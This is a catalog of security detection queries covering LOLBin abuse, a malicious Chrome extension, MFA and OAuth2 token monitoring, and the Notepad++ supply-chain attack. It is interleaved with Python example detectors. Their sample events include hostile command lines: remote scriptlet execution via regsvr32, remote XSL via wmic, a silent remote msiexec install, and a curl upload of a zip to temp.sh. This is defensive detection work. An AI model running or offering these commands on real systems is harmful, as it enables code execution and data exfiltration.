EXPLORE DETECTIONS
LOLBin Msiexec
This query detects the use of Msiexec.exe. Msiexec.exe: the Windows Installer utility, which executes MSI packages or DLLs (including remote or transformed payloads) and is frequently misused by attackers for stealthy code execution and application-control bypass. [LOLBAS - Msiexec.exe](https://lolbas-project.github.io/lolbas/Binaries/Msiexec/)
LOLBin Regsvr32
This query detects the use of Regsvr32 when it has loaded scrobj.dll. Regsvr32.exe: a native Windows tool for registering DLLs, frequently misused by attackers to execute remote or local scriptlets (SCT files), often enabling application whitelisting bypass and stealthy code execution. [LOLBAS - Regsvr32.exe](https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/)
LOLBin Rundll32
This query detects the use of Rundll32 from parent processes that are known for misuse. Rundll32.exe: a native Windows binary that can be abused to execute DLLs, scripts, and other payloads, making it a common technique in Living-off-the-Land attacks. [LOLBAS - Rundll32.exe](https://lolbas-project.github.io/lolbas/Binaries/Rundll32/)
LOLBin WMIC
This query detects the use of WMIC. Wmic.exe: a built-in Windows tool for scripting and remote system management, which adversaries exploit to run commands, load executables via alternate data streams, execute remote or XSL-formatted payloads, and move files stealthily. [LOLBAS - Wmic.exe](https://lolbas-project.github.io/lolbas/Binaries/Wmic/)
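The four LOLBin entries above all reduce to the same kind of check: match the process image, then look at the command line or the parent for the abuse pattern. The block below is an added example (not the platform's own query logic) that runs those checks over constructed process-start records. The record shape, the list of suspicious rundll32 parents, and the exact command-line patterns are assumptions made for this example; the indicators themselves (scrobj.dll, remote MSI/XSL payloads, known-bad parents) come from the entries and the linked LOLBAS pages.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-start record. The field names are an assumption for this
    example; map them to your EDR's image path, command line and parent fields."""
    image: str          # full path of the started process
    command_line: str
    parent: str         # basename of the parent process


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


HTTP_URL = re.compile(r"https?://", re.IGNORECASE)

# Parents that normally have no reason to launch rundll32 (assumed list).
RUNDLL32_ABUSE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "msiexec.exe",
}


def lolbin_findings(ev: ProcessEvent) -> list[str]:
    """Return the names of the LOLBin rules an event matches (empty if benign)."""
    name = basename(ev.image)
    cl = ev.command_line.lower()
    parent = ev.parent.lower()
    hits: list[str] = []

    if name == "msiexec.exe":
        # Remote package install (URL on the command line) or DLL execution via /y or /z.
        if HTTP_URL.search(cl) or re.search(r"(^|\s)/(y|z)(\s|$)", cl):
            hits.append("LOLBin Msiexec")

    if name == "regsvr32.exe" and "scrobj.dll" in cl:
        # scrobj.dll is the scriptlet host; /i:<url>.sct scrobj.dll is the classic form.
        hits.append("LOLBin Regsvr32")

    if name == "rundll32.exe" and parent in RUNDLL32_ABUSE_PARENTS:
        hits.append("LOLBin Rundll32")

    if name == "wmic.exe":
        # XSL script processing (/format: pointing at a URL or .xsl file) or process creation.
        if re.search(r"/format:\S*(https?://|\.xsl)", cl) or "process call create" in cl:
            hits.append("LOLBin WMIC")

    return hits


def scan(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Map each matching command line to its findings; benign events are dropped."""
    return {ev.command_line: hits for ev in events if (hits := lolbin_findings(ev))}


# Constructed sample events for this example (hosts and paths are made up).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:http://files.example.test/payload.sct scrobj.dll",
                 "winword.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\Public\stage.dll,Start",
                 "excel.exe"),
    ProcessEvent(r"C:\Windows\System32\wbem\wmic.exe",
                 r'wmic os get /format:"https://files.example.test/evil.xsl"',
                 "cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /q /i http://files.example.test/pkg.msi",
                 "powershell.exe"),
    # Benign: local MSI install, vendor DLL registration, and a Control Panel applet.
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /i C:\Temp\vendor-setup.msi /qn", "explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll", "msiexec.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe shell32.dll,Control_RunDLL", "explorer.exe"),
]

if __name__ == "__main__":
    for cl, hits in scan(SAMPLE_EVENTS).items():
        print(", ".join(hits), "<-", cl)
```

The Regsvr32 entry keys on scrobj.dll being loaded, which is an image-load event rather than a command-line string; matching the command line as above catches the common `/i:<url> scrobj.dll` form but misses cases where the DLL is loaded by other means, so pair this with a DLL-load rule where the telemetry supports it.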
Malicious Chrome Extension FreeVPN-One Detection
This logic detects the presence of the malicious Chrome extension FreeVPN[.]One by identifying its unique extension ID across installed browsers. The logic further correlates this presence with network communications initiated by the extension to suspicious or untrusted domains. By combining extension enumeration with traffic analysis, the detection ensures high fidelity with minimal false positives. This layered approach strengthens visibility into malicious browser add-ons masquerading as VPN tools. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/Malicious-Chrome-Extension-FreeVPN.One-Detection.md)
MFA Failures
Displays the count of MFA authentication failures caused by service errors or by the user not being enrolled. A sudden spike in these errors may indicate a service incident requiring immediate investigation and response.
MFA Status Monitoring
Displays Multi-Factor Authentication (MFA) status events over time. Monitor for unexpected spikes in denials, errors, or timeouts that may indicate security threats, system issues, or user experience problems requiring investigation.
MongoDB Processes on Windows & Linux Hosts (CVE-2025-14847)
This query identifies Windows and Linux Hosts running MongoDB processes.
New API Keys within the Falcon Platform
This query provides a list of newly created API Keys, including relevant details such as Client Name and Client ID.
New installed Sensors
This query loads host inventory data from aid_master_main.csv, enriches it with details from aid_master_details.csv, and outputs a cleaned, formatted table of host information.
Notepad++ supply chain attack
This query detects a state-sponsored supply chain attack where the legitimate Notepad++ updater (gup.exe) is hijacked to download the Chrysalis backdoor. It identifies the attack by spotting unauthorized network connections from the updater, malicious DLL side-loading (e.g., BluetoothService.exe loading log.dll), and data exfiltration commands involving curl and temp.sh. https://notepad-plus-plus.org/news/hijacked-incident-info-update/ https://notepad-plus-plus.org/news/clarification-security-incident/ https://securelist.com/notepad-supply-chain-attack/118708/ https://notepad-plus-plus.org/assets/data/IoCFromFormerHostingProvider.txt https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
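The Notepad++ entry above describes three independent signals: the updater (gup.exe) connecting somewhere it should not, BluetoothService.exe loading log.dll, and a curl command to temp.sh. The block below is an added example (not the platform's own query) that classifies constructed network-connection, image-load and process-start records against those three indicators. The record shapes, the sample hosts and paths, and the list of hosts the genuine updater is expected to reach are assumptions made for this example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union


@dataclass(frozen=True)
class NetConnect:
    process: str        # basename of the connecting process
    remote_host: str


@dataclass(frozen=True)
class ImageLoad:
    process: str
    dll_path: str


@dataclass(frozen=True)
class ProcessStart:
    process: str
    command_line: str


Event = Union[NetConnect, ImageLoad, ProcessStart]

# Hosts the genuine updater is expected to contact (assumption for this example).
UPDATER_ALLOWED = ("notepad-plus-plus.org",)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def host_allowed(host: str, allowed: Tuple[str, ...] = UPDATER_ALLOWED) -> bool:
    """True if host is one of the allowed domains or a subdomain of one.
    Suffix matching is anchored on a dot so 'notepad-plus-plus.org.evil.example' fails."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def classify(ev: Event) -> Optional[str]:
    """Return the name of the indicator an event matches, or None."""
    proc = basename(ev.process)
    if isinstance(ev, NetConnect):
        if proc == "gup.exe" and not host_allowed(ev.remote_host):
            return "updater_unexpected_host"
    elif isinstance(ev, ImageLoad):
        if proc == "bluetoothservice.exe" and basename(ev.dll_path) == "log.dll":
            return "sideload_log_dll"
    elif isinstance(ev, ProcessStart):
        cl = ev.command_line.lower()
        if "curl" in cl and "temp.sh" in cl:
            return "curl_temp_sh_exfil"
    return None


def findings(events: List[Event]) -> List[Tuple[str, Event]]:
    """(indicator, event) pairs for every event that matched, in input order."""
    return [(rule, ev) for ev in events if (rule := classify(ev))]


# Constructed sample telemetry for this example (hosts and paths are made up).
SAMPLE_EVENTS: List[Event] = [
    NetConnect("gup.exe", "notepad-plus-plus.org"),             # legitimate update check
    NetConnect("gup.exe", "cdn.update-mirror.example"),         # updater pulled from elsewhere
    ImageLoad("BluetoothService.exe", r"C:\ProgramData\Bluetooth\log.dll"),
    ImageLoad("BluetoothService.exe", r"C:\Windows\System32\kernel32.dll"),
    ProcessStart("cmd.exe", r'cmd.exe /c curl -F "file=@C:\Users\Public\docs.zip" https://temp.sh/upload'),
    ProcessStart("cmd.exe", r"cmd.exe /c curl -sS https://intranet.example/health"),
]

if __name__ == "__main__":
    for rule, ev in findings(SAMPLE_EVENTS):
        print(rule, "<-", ev)
```

Each indicator is scored on its own here; in practice the updater connection is the noisiest of the three, so group the hits by host and treat two or more distinct indicators on the same host within a short window as the high-confidence case.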
OAuth2 Token Burst: Token Harvesting (Microsoft Defender for Identity)
Detects a sudden surge in OAuth2 token requests or acquisitions within a short timeframe, as identified by Microsoft Defender for Identity. This behavior may indicate token harvesting activity, where an attacker attempts to obtain multiple access tokens to abuse authentication sessions and maintain unauthorized access.
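The MFA Failures entry and the OAuth2 Token Burst entry both look for the same shape of signal: a count of events crossing a threshold inside a short window. The block below is an added example (not the platform's or Microsoft Defender for Identity's own detection) of a sliding-window burst detector applied to constructed authentication events. The event shape, the window sizes, the thresholds and the grouping keys are assumptions for this example; the same helper serves the per-principal OAuth2 case and the per-reason MFA case by changing only the key function.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Callable, Dict, Iterable, List


@dataclass(frozen=True)
class AuthEvent:
    """One identity-provider event. Field names are an assumption for this example."""
    ts: datetime
    kind: str         # "oauth2_token" or "mfa_failure"
    principal: str    # user or application the event is attributed to
    detail: str       # token grant type, or MFA failure reason


def peak_in_window(events: Iterable[AuthEvent], kind: str, window: timedelta,
                   key: Callable[[AuthEvent], str] = lambda e: e.principal) -> Dict[str, int]:
    """For each key, the largest number of `kind` events inside any window of the given length."""
    times: Dict[str, List[datetime]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == kind:
            times[key(ev)].append(ev.ts)
    peaks: Dict[str, int] = {}
    for k, ts in times.items():
        q: deque = deque()
        peak = 0
        for t in ts:
            q.append(t)
            while t - q[0] > window:      # drop events that fell out of the window
                q.popleft()
            peak = max(peak, len(q))
        peaks[k] = peak
    return peaks


def burst_alerts(events: Iterable[AuthEvent], kind: str, window: timedelta, threshold: int,
                 key: Callable[[AuthEvent], str] = lambda e: e.principal) -> Dict[str, int]:
    """Keys whose peak windowed count reached the threshold, with that peak."""
    return {k: n for k, n in peak_in_window(events, kind, window, key).items() if n >= threshold}


# Constructed sample events for this example.
BASE = datetime(2025, 1, 1, 9, 0, 0)


def _events(kind: str, principal: str, detail: str, offsets_s: Iterable[int]) -> List[AuthEvent]:
    return [AuthEvent(BASE + timedelta(seconds=s), kind, principal, detail) for s in offsets_s]


SAMPLE_EVENTS: List[AuthEvent] = (
    # Normal user: a few token refreshes over the hour and one not-enrolled failure.
    _events("oauth2_token", "alice", "refresh_token", [0, 1800, 3500])
    + _events("mfa_failure", "alice", "user_not_enrolled", [700])
    # Service principal acquiring 15 tokens inside 90 seconds (harvesting pattern).
    + _events("oauth2_token", "svc-sync-01", "client_credentials", range(600, 690, 6))
    # MFA service incident: 40 service-error failures from ten users within two minutes.
    + [AuthEvent(BASE + timedelta(seconds=2400 + 3 * i), "mfa_failure", f"user{i % 10}", "service_error")
       for i in range(40)]
)

WINDOW = timedelta(seconds=120)

if __name__ == "__main__":
    print("token burst per principal:", burst_alerts(SAMPLE_EVENTS, "oauth2_token", WINDOW, 10))
    print("mfa failures per user:    ", burst_alerts(SAMPLE_EVENTS, "mfa_failure", WINDOW, 10))
    print("mfa failures per reason:  ", burst_alerts(SAMPLE_EVENTS, "mfa_failure", WINDOW, 25,
                                                      key=lambda e: e.detail))
```

Keying the MFA failures by reason rather than by user is what separates a service incident (many users, one reason, one window) from a single account under attack; the per-user view stays quiet while the per-reason view fires, which is the distinction the MFA Failures entry above is trying to surface.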
OS Platform ratio
This query aggregates SensorHeartbeat events by operating system platform to show the relative distribution of endpoints per OS. It is well suited for visualization as a pie chart, providing a quick overview of platform coverage and identifying imbalances or unexpected OS presence in the environment.